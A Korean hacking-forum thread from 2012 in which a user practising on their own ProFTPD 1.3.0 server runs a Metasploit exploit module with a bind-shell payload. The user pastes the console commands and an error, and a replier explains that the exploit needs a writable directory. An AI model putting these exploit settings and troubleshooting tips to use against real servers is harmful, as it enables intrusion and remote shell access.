22018, 1/1101 회원가입  로그인  
   xhosa123
   ftp 서버 공격 실습 중,,,

http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=29802 [복사]


안녕하세요.
ftp서버 만들려고 이것저것 찾던도중 proftpd가 눈에 들어와서 설치하고 설정하고 이것저것하고있는데
proftpd exploit이 있더라고요. ~.~
한번해볼까하고 바로 윈도우용 metasploit키고 사용해봤는데


msf  exploit(proftp_sreplace) > exploit

[*] Started reverse handler on
[*] Trying target ProFTPD 1.3.0 (source install) / Debian 3.1...
[*] FTP Banner: 220 ProFTPD 1.3.0 Server (ProFTPD Default Installation)
[-] Exploit failed: Unable to get current working directory
.........

혹시 이건 어떤오류인가요?ㅜ

정확한 버전은

proftpd 1.3.0 입니다.

  Hit : 8004     Date : 2012/12/01 10:30



    
멍멍 소스코드 레벨에서 보는 습관을 들이시면 금방 답이 나올 듯합니다! 2012/12/01  
멍멍 해당 에러를 출력하기 전에 어떤 ftp command를 실행하려고 시도했는지 확인해 보세욤 2012/12/01  
xhosa123 ㄴ멍멍


msf exploit(proftp_sreplace) > use exploit/linux/ftp/proftp_sreplace
msf exploit(proftp_sreplace) > set TARGET 2
TARGET => 2
msf exploit(proftp_sreplace) > set PAYLOAD linux/x86/shell_bind_tcp
PAYLOAD => linux/x86/shell_bind_tcp
msf exploit(proftp_sreplace) > set RHOST
RHOST =>
msf exploit(proftp_sreplace) > set WRITABLE /root
WRITABLE => /root
msf exploit(proftp_sreplace) > exploit

이렇게 명령어를 줬는데
좋지않은 영어실력으로 해석해보니
사용중인 ftp경로가 없다고 나오네요..
경로를 만들어주고 다시 시도해봐야겠어요.
감사합니다
2012/12/01  
멍멍 아 제가 말씀드린 커맨드란, 메타스플로잇 커맨드가 아닌 ftp 서버측에 실행하는 커맨드
즉, exploit/linux/ftp/proftp_sreplace 소스파일 내에 명시된 부분을 말한 것입니당
그리고 WRITABLE은 ftp 공격에서 흔히 요구되는 "쓰기 권한이 있는 디렉토리"를 말하는 것 같네요
/root라고 하면 쓰기 권한에 충족되지 않을 것 같습니다.
http://www.exploit-db.com/exploits/16852/
소스를 잠시 보니 "CWD /root"라는 명령을 실행하게 되는데, /root라는 디렉토리가 없으므로
Unable to get current working directory 에러가 나는 것 같네요
최근 ftp 서버들은 chroot가 적용되기 때문에 상위경로인 /root가 없다고 나오는 것일 겁니다
2012/12/01  
xhosa123 그럼 쓰기가능한경로를 적어줘야하나요? 2012/12/01  
xhosa123 예를들어서어떤경로를적어줘야하나요? 2012/12/01  
멍멍 이정도는 직접 하실 수 있을 것 같은데요..~! 2012/12/05